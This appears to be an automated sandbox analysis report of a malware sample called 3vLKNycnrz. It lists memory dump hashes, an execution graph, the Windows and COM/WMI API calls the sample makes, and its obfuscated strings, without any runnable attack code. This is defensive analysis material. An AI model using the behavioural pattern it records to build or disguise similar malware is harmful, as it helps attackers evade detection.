                                                        • Opcode Fuzzy Hash: 79999e7dee51fb5e1f83f687626f93597c84c6acd79c61b6d0bcfc6e9b1f2fd2
                                                        • Instruction Fuzzy Hash: C8512974A10218DFEB58DF38D455BA97BF2EB49300F5144AAE80AEB391DB359D85CF01
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 671d9bf01c7a3997478886bc70b27ff2d2bb93dfaedf3b6e160ccd671164205f
                                                        • Instruction ID: faae9302c6b70bdee71761469bda04e9f5dfdc1d5b7acdf92aaa66b9b5612017
                                                        • Opcode Fuzzy Hash: 671d9bf01c7a3997478886bc70b27ff2d2bb93dfaedf3b6e160ccd671164205f
                                                        • Instruction Fuzzy Hash: EE41D131A44205DFEF52CF95EC81BAEBFB2EF88300F218526E541EB250D6319985DBE1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4ad57ed12662829c3eae7cb0788c0b6e45d1e92ec8206cda9b38cd44b1526431
                                                        • Instruction ID: 4a2f338fc28ee394905f8d01a8a9361abd28de1fb2c0962d1e82ab72eb369c7a
                                                        • Opcode Fuzzy Hash: 4ad57ed12662829c3eae7cb0788c0b6e45d1e92ec8206cda9b38cd44b1526431
                                                        • Instruction Fuzzy Hash: 0741A431A44209DFEB52CF95EC41BAEBFB6FB88300F218526E505DB250D631D9819BE1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb7252bfd0fd3ab2aa59a2860fdf5a0adfa0c581e1516004efa5d133a797a272
                                                        • Instruction ID: 46b50352610a5fefc7c8e18ff8ba7f1ec07c65b29d390679579389fb97b5052a
                                                        • Opcode Fuzzy Hash: bb7252bfd0fd3ab2aa59a2860fdf5a0adfa0c581e1516004efa5d133a797a272
                                                        • Instruction Fuzzy Hash: 95410531A48205DFEB42CFA4ED81BAEBFB2EB49300F258422E541DB350D635D9849BE1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1432211074.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6c70000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c4d8e9469dbf58d6254b976d134089ed56c4c22d927184e16444cfd256b323b0
                                                        • Instruction ID: d14d7df90c782b1dac8d129a47a999e01d9eb0ef171d7cda6512c98c305f0749
                                                        • Opcode Fuzzy Hash: c4d8e9469dbf58d6254b976d134089ed56c4c22d927184e16444cfd256b323b0
                                                        • Instruction Fuzzy Hash: 3441B6B0E012298BEBA8CF1ACD4469DBAF2BB89304F11C5EAD40DA7254DB745AC5CF45
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1432211074.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6c70000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf1cb0f8894db2a87da5143fdca34fe64b836468672e278778217f0b08a73565
                                                        • Instruction ID: 1bfde61b49d6cc68f36bb6606d15fc28511eb57cc842c3fcaf114f882bdec8e1
                                                        • Opcode Fuzzy Hash: bf1cb0f8894db2a87da5143fdca34fe64b836468672e278778217f0b08a73565
                                                        • Instruction Fuzzy Hash: F7314D71D057988FEB69CF2B8C5469ABBF6EF85300F05C0EAD4489B255DB740A85CF50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9729bddfb7574e8455e13bbb7f9bbfcf4e16e3ae7c3e92acd4725dfe192dc560
                                                        • Instruction ID: bd8b7fd9f0b1246e1fad6c70c3dddfa91a2d4fd1d93c08b246eac11803916e7d
                                                        • Opcode Fuzzy Hash: 9729bddfb7574e8455e13bbb7f9bbfcf4e16e3ae7c3e92acd4725dfe192dc560
                                                        • Instruction Fuzzy Hash: 1A31A3B0D116188BEB69CF6BCC4879EFAF7BF89304F14C5AAD40CA6254DB740A859F10
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 658b3422ee16ff1aba7d3131ea2e40bd913b712c0fe806574d9d2c0d6e08c6ff
                                                        • Instruction ID: 3a7eea02a236bec384b4dbb787e9aefccfa916e66abec79354de68cb4fd68c85
                                                        • Opcode Fuzzy Hash: 658b3422ee16ff1aba7d3131ea2e40bd913b712c0fe806574d9d2c0d6e08c6ff
                                                        • Instruction Fuzzy Hash: 603197B1D016588BEB69CF6BC94938EFBF7BFC9304F14C5AAC448AA255EB7405858F10

                                                        Execution Graph

                                                        Execution Coverage

                                                        Dynamic/Packed Code Coverage

                                                        Signature Coverage

                                                        Execution Coverage:3.1%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:27.1%
                                                        Total number of Nodes:59
                                                        Total number of Limit Nodes:2
                                                        Show Legend
                                                        Hide Nodes/Edges
                                                        execution_graph 13524 408620 13526 40862f 13524->13526 13525 40876f ExitProcess 13526->13525 13527 408644 GetCurrentProcessId GetCurrentThreadId 13526->13527 13530 4086c2 13526->13530 13528 408669 13527->13528 13529 40866d SHGetSpecialFolderPathW GetForegroundWindow 13527->13529 13528->13529 13529->13530 13530->13525 13531 43a6e1 13532 43a6ea GetForegroundWindow 13531->13532 13533 43a6fd 13532->13533 13534 43cce0 13535 43cd00 13534->13535 13538 43cd3e 13535->13538 13540 43a5b0 LdrInitializeThunk 13535->13540 13536 43cdbe 13538->13536 13541 43a5b0 LdrInitializeThunk 13538->13541 13540->13538 13541->13536 13542 40c8e6 CoInitializeEx CoInitializeEx 13543 438aa4 13544 438aae RtlAllocateHeap 13543->13544 13545 40ca6d CoInitializeSecurity 13546 43b12d 13547 43b140 13546->13547 13548 43b1bf 13547->13548 13553 43a5b0 LdrInitializeThunk 13547->13553 13552 43a5b0 LdrInitializeThunk 13548->13552 13551 43b30b 13552->13551 13553->13548 13554 40a970 13557 40a9a0 13554->13557 13555 40ae9c 13557->13555 13557->13557 13558 438ad0 13557->13558 13559 438ae3 13558->13559 13560 438af4 13558->13560 13561 438ae8 RtlFreeHeap 13559->13561 13560->13555 13561->13560 13510 4330d2 13511 4330d7 13510->13511 13512 4330fd GetUserDefaultUILanguage 13511->13512 13513 433120 13512->13513 13567 40d4f3 13571 401f70 13567->13571 13569 40d4f8 CoUninitialize 13570 40e292 13569->13570 13572 401f7e 13571->13572 13573 433df5 13576 433e31 13573->13576 13574 433e93 13576->13574 13577 43a5b0 LdrInitializeThunk 13576->13577 13577->13576 13519 43af94 13520 43afa0 13519->13520 13520->13520 13523 43a5b0 LdrInitializeThunk 13520->13523 13522 43b1ec 13523->13522 13578 43a8fb 13580 43a940 13578->13580 13579 43aaae 13580->13579 13582 43a5b0 LdrInitializeThunk 13580->13582 13582->13579 13583 43ab3b 13584 43ab60 13583->13584 13585 43abe2 13584->13585 13589 43a5b0 LdrInitializeThunk 13584->13589 13588 43a5b0 LdrInitializeThunk 13585->13588 13588->13585 13589->13585

                                                        Executed Functions

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 00408644
                                                        • GetCurrentThreadId.KERNEL32 ref: 0040864D
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040869F
                                                        • GetForegroundWindow.USER32 ref: 004086B4
                                                        • ExitProcess.KERNEL32 ref: 00408771
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                        • String ID:
                                                        • API String ID: 4063528623-0
                                                        • Opcode ID: f269ce15b62759249a87e8095c09880a933a93e1a5a8af1a285a3f39b88257a8
                                                        • Instruction ID: 2ab26929ac22d33901149aa551f8fc81b7b3b861aac10a10b3a4e62ada129a5c
                                                        • Opcode Fuzzy Hash: f269ce15b62759249a87e8095c09880a933a93e1a5a8af1a285a3f39b88257a8
                                                        • Instruction Fuzzy Hash: 30314473A0031D0BCB247EB55D8A36AF1869BC4310F1F103D6A89EB3D2EE6E0C058299

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 115 43a320-43a356 116 43a360-43a3ac 115->116 116->116 117 43a3ae-43a3bb 116->117 119 43a3c1-43a3c6 117->119 120 43a446-43a47f 117->120 119->120 121 43a480-43a4cc 120->121 121->121 122 43a4ce-43a4d5 121->122 123 43a4d9-43a4db 122->123 124 43a4e1-43a4e6 123->124 125 43a430-43a443 123->125 124->125 125->120
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $A.C$(EFG$L9;$M5F7
                                                        • API String ID: 0-716650282
                                                        • Opcode ID: a3248d0ae3c2ff1dc0494626869ba73b6ec220572a9d65c3157c373830ba5bef
                                                        • Instruction ID: 9b362c61da336a2ae8ea6290e8c0db5c8ff5c04be66d4453546d1038febf736e
                                                        • Opcode Fuzzy Hash: a3248d0ae3c2ff1dc0494626869ba73b6ec220572a9d65c3157c373830ba5bef
                                                        • Instruction Fuzzy Hash: D3312632651B009FC724CF75DC46356BAE2BB86754F25CA3DD0A6C7795E7B8D0058B08

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 133 40bd61-40bdbf 134 40bdc0-40be1b 133->134 134->134 135 40be1d-40be26 134->135 136 40be41-40be50 135->136 137 40be28-40be2f 135->137 139 40be52-40be54 136->139 140 40be75-40be95 136->140 138 40be30-40be3f 137->138 138->136 138->138 141 40be60-40be71 139->141 142 40bea0-40bee5 140->142 141->141 143 40be73 141->143 142->142 144 40bee7-40bf14 142->144 143->140 146 40bf1b-40bf37 144->146
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ?L"$iL"
                                                        • API String ID: 0-3699518731
                                                        • Opcode ID: f70d4f0d1b59178c64416d6cc34cefdb3cfcb84c192bbc1135f2e6c00128c05a
                                                        • Instruction ID: 52a9b6de7af2d81cb0eea610d47e69b686b57175818a8db13fa0bffc6a3e7ece
                                                        • Opcode Fuzzy Hash: f70d4f0d1b59178c64416d6cc34cefdb3cfcb84c192bbc1135f2e6c00128c05a
                                                        • Instruction Fuzzy Hash: F551F472E102258FD714CF58CC90AABBBB1FF89314B0A9169D951BB3A1D7789C018B98

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 184 43a5b0-43a5e2 LdrInitializeThunk
                                                        APIs
                                                        • LdrInitializeThunk.NTDLL(0043C8CB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A5DE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: 0?>=
                                                        • API String ID: 2994545307-3891647100
                                                        • Opcode ID: 4ac6dad85a8b8badd7a4f14bbafc2d79f95844eb08445b7414a751a7e0bb29ca
                                                        • Instruction ID: 8ec6b15b855e60249eabea3af3a81123ae50d9401847775218f9f777cc84a275
                                                        • Opcode Fuzzy Hash: 4ac6dad85a8b8badd7a4f14bbafc2d79f95844eb08445b7414a751a7e0bb29ca
                                                        • Instruction Fuzzy Hash: D8310834704300ABE7104B64ACD1B7BBBE5EB8A714F24693EF685B7291D628FC11C70A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 126 43a6b4-43a6bf 127 43a6c0-43a6d4 126->127 127->127 128 43a6d6-43a72c GetForegroundWindow call 43c6f0 127->128
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 0043A6EF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: ForegroundWindow
                                                        • String ID: 5()*
                                                        • API String ID: 2020703349-1326618346
                                                        • Opcode ID: ef895584e3463f3f68fd34886f599cb15f52c97dd58883bf3794c0fc238b69aa
                                                        • Instruction ID: c71105b9e17c32472be62313526bc1113bf90732a25e8e6de3dcecaaaeb78642
                                                        • Opcode Fuzzy Hash: ef895584e3463f3f68fd34886f599cb15f52c97dd58883bf3794c0fc238b69aa
                                                        • Instruction Fuzzy Hash: A6F0BBB5E5865087DB18DF359C6546B7BE1A75A324F24693EE582D3242D63EC801C30E

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 132 40c8e6-40ca4a CoInitializeEx * 2
                                                        APIs
                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 0040C8EA
                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CA31
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID:
                                                        • API String ID: 2538663250-0
                                                        • Opcode ID: 6f6effb1460477831ac12bc4fe1b86987d569b8e94679f6ac3f5153db78c57cc
                                                        • Instruction ID: ca5249e1fd23fe5382115dc6c75c30d5a39f336e6071931cf83ee7099c131467
                                                        • Opcode Fuzzy Hash: 6f6effb1460477831ac12bc4fe1b86987d569b8e94679f6ac3f5153db78c57cc
                                                        • Instruction Fuzzy Hash: CA41B9B4C10B40AFD370EF39D94B7127EB4AB05250F508B1EF9EA866D4E631A4198BD7

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 168 4330d2-4330f7 call 4142d0 call 43c130 173 4330f9-4330fb 168->173 174 4330fd-43311e GetUserDefaultUILanguage 168->174 173->174 176 433120-433123 174->176 177 433193-4331c2 176->177 178 433125-433191 176->178 178->176
                                                        APIs
                                                        • GetUserDefaultUILanguage.KERNELBASE ref: 004330FD
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: DefaultLanguageUser
                                                        • String ID:
                                                        • API String ID: 95929093-0
                                                        • Opcode ID: fecec9b8bdc620ed66c5f7f7fbbde8d10dba92c50af755c723726afc618a3463
                                                        • Instruction ID: ede672be39caaa6dafdc8ddbe4b8af2e0014e6452cca2b92b4faab07863be0e6
                                                        • Opcode Fuzzy Hash: fecec9b8bdc620ed66c5f7f7fbbde8d10dba92c50af755c723726afc618a3463
                                                        • Instruction Fuzzy Hash: CE214B33E041A58BCF28CF7C8D152AEBFB25B9A220F1943A9DC90B7381D6344E418BD1

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 179 43a6e1-43a6f8 GetForegroundWindow call 43c6f0 182 43a6fd-43a72c 179->182
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 0043A6EF
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: ForegroundWindow
                                                        • String ID:
                                                        • API String ID: 2020703349-0
                                                        • Opcode ID: 5ee508286f2350a72e81952e3a6e277e2defe54f026306661ed469a043f484d7
                                                        • Instruction ID: 1dc4ab3a7fed408f0b80ed6fae16d8750af52cf01a428f3bca4c5586c6fca7e7
                                                        • Opcode Fuzzy Hash: 5ee508286f2350a72e81952e3a6e277e2defe54f026306661ed469a043f484d7
                                                        • Instruction Fuzzy Hash: EDE086BDF14A248BCB18CF65ECA542437A2A759311724943FE803D3357DD3ADC02D649

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 183 40ca6d-40caa3 CoInitializeSecurity
                                                        APIs
                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CA7F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InitializeSecurity
                                                        • String ID:
                                                        • API String ID: 640775948-0
                                                        • Opcode ID: 73c3ff371ddf2dba0e2c51fe4018f5a35349ad899bfef2bbca8f86c89653fe45
                                                        • Instruction ID: 5b0f5add59d0d7e095468882ba85f577866da2625a1fc62412e9c605a90bd8bb
                                                        • Opcode Fuzzy Hash: 73c3ff371ddf2dba0e2c51fe4018f5a35349ad899bfef2bbca8f86c89653fe45
                                                        • Instruction Fuzzy Hash: 03E05E39BD42007BF7244B18EC4BF40224293CAB21F788235B311EE7E8CCE8A449860C

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 185 438ad0-438adc 186 438ae3-438aee call 43bca0 RtlFreeHeap 185->186 187 438af4-438af5 185->187 186->187
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(?,00000000,?,0043A596,?,0040B500,00000000,0040B55F), ref: 00438AEE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: 1a6db2d9ad1dda0081a400328015eb6b4d5948ceae9bed2b2506b368cf6b16e2
                                                        • Instruction ID: 00c34fd169b5899b633ec4a717eb9c3f8ad66db4c8575b282a5a18a1672db1fa
                                                        • Opcode Fuzzy Hash: 1a6db2d9ad1dda0081a400328015eb6b4d5948ceae9bed2b2506b368cf6b16e2
                                                        • Instruction Fuzzy Hash: D9D0C931405622EBCA111F25EC06B8A7A64DF093A1F025465A400AA072C765EC518AD8
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 00438AB4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 33cbe60f46516dd729390eb0eccd9d123dfa1e23fdcf3b14e3fb3e7dd79eea06
                                                        • Instruction ID: f0201cb6773035d3177af80b22c7b0d5ecb2c2dae01169802860e208a7d99c90
                                                        • Opcode Fuzzy Hash: 33cbe60f46516dd729390eb0eccd9d123dfa1e23fdcf3b14e3fb3e7dd79eea06
                                                        • Instruction Fuzzy Hash: DCC04C34141211ABD5351B119D4DF6F3D79DB4BB93F101024F9055409247746001996D
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: Uninitialize
                                                        • String ID:
                                                        • API String ID: 3861434553-0
                                                        • Opcode ID: 90a3a7e7db08da2634a4ed5c88deb32946b38afa0e0eeedc36dbb0d2118d5f56
                                                        • Instruction ID: fcc88d101f4a76860ca4f5e012e2520af0942ee69f666cb17ae4560173826b52
                                                        • Opcode Fuzzy Hash: 90a3a7e7db08da2634a4ed5c88deb32946b38afa0e0eeedc36dbb0d2118d5f56
                                                        • Instruction Fuzzy Hash: A3C0127D6480419BD70C8721BC054253756AB8A3493245479DD0352276E5319456851D

                                                        Non-executed Functions

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: &t6v$&:$&:$,p&r$0'$1h/j$:<$;l9n$<[5]$=S2U$=_%A$>E$?W4Y$A/6Q$B7P9$EG$JG$N+P-$Z?E!$^_$mlkj$wp$wp$xM`O$8:
                                                        • API String ID: 0-4036459184
                                                        • Opcode ID: b86619ce0fb86be72c075babf46424e4b6a5dc08b7dfa0c816d11e3d25bdbeba
                                                        • Instruction ID: 621ace128c741c72fbbdfe5d89d7f9e24a1e8e275d799776b0bb284a418f6a1d
                                                        • Opcode Fuzzy Hash: b86619ce0fb86be72c075babf46424e4b6a5dc08b7dfa0c816d11e3d25bdbeba
                                                        • Instruction Fuzzy Hash: A9B2EBB5A04725CFD724CF24D8806AABBB1FF85304F2485ADD49AAF742D775A842CF84
                                                        APIs
                                                        • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C,00000000), ref: 00435F83
                                                        • SysAllocString.OLEAUT32(0000D43F), ref: 00435FF8
                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00436036
                                                        • SysAllocString.OLEAUT32(0000D43F), ref: 00436095
                                                        • SysAllocString.OLEAUT32(0000D43F), ref: 00436127
                                                        • VariantInit.OLEAUT32(?), ref: 00436196
                                                        • SysFreeString.OLEAUT32(?), ref: 0043643F
                                                        • SysFreeString.OLEAUT32(?), ref: 00436448
                                                        • SysFreeString.OLEAUT32(00000000), ref: 0043645C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFree$BlanketCreateInitInstanceProxyVariant
                                                        • String ID: "b7d$%)*+$,rSt$/~ p$1n*`$:j.l$Ef]x$Yz=|
                                                        • API String ID: 2737081056-2387816766
                                                        • Opcode ID: b7b6029c48d98f914741704bef50a66fad523e17e46cc5b463d75fe370098866
                                                        • Instruction ID: 8de3c40ff093b11e2e09931193b767e06f162f6ac0398119def9de2cc4740bb7
                                                        • Opcode Fuzzy Hash: b7b6029c48d98f914741704bef50a66fad523e17e46cc5b463d75fe370098866
                                                        • Instruction Fuzzy Hash: DA323371A083119BD310CF28C88176BBBE5EFC9324F159A2DE9D58B391D778D805CB8A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: &t6v$&:$&:$,p&r$0'$1h/j$:<$;l9n$<[5]$=_%A$>E$A/6Q$EG$JG$mlkj$wp$wp$xM`O$8:
                                                        • API String ID: 0-611813272
                                                        • Opcode ID: 4bf8c3e06e125019cc28075f44cd85383120c8b00b071029927c52c99f19c43b
                                                        • Instruction ID: e3462e6896757585fce53d35f3d4f79783bf105092c3b89bd78476700a500846
                                                        • Opcode Fuzzy Hash: 4bf8c3e06e125019cc28075f44cd85383120c8b00b071029927c52c99f19c43b
                                                        • Instruction Fuzzy Hash: A4B2EAB4A00325CFDB24CF29D8407AABBB1FF45304F2486ADD599AB741D735A982CF84
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: &t6v$&:$&:$,p&r$0'$1h/j$:<$;l9n$<[5]$=_%A$>E$A/6Q$EG$JG$mlkj$wp$wp$xM`O$8:
                                                        • API String ID: 0-611813272
                                                        • Opcode ID: ff2a99c19f9b840e95b2d17971a0ad3f292e750e1885d5819587218073c6286e
                                                        • Instruction ID: b882ab932fa44272eea2bbe9296e9b6344ed88f024d6a465cc22b9f2988137a7
                                                        • Opcode Fuzzy Hash: ff2a99c19f9b840e95b2d17971a0ad3f292e750e1885d5819587218073c6286e
                                                        • Instruction Fuzzy Hash: 3292CAB5A00725CFDB24CF25D8806AABBB1FF45304F2485ADC59A6F752D735A882CF84
                                                        APIs
                                                          • Part of subcall function 0043A5B0: LdrInitializeThunk.NTDLL(0043C8CB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A5DE
                                                        • FreeLibrary.KERNEL32(?), ref: 00419CAA
                                                        • FreeLibrary.KERNEL32(?), ref: 00419D2B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary$InitializeThunk
                                                        • String ID: J/h$mlkj$mlkj$mlkj$Wu
                                                        • API String ID: 764372645-1318733947
                                                        • Opcode ID: 64b866459d3efd96d91c01d890908a9db4bf1cc0fc2684fdae2d024f71781d6d
                                                        • Instruction ID: 9d079e2a3d689fb2d695da07dff0836209dff4b8f771087d1f1530ec48afe32a
                                                        • Opcode Fuzzy Hash: 64b866459d3efd96d91c01d890908a9db4bf1cc0fc2684fdae2d024f71781d6d
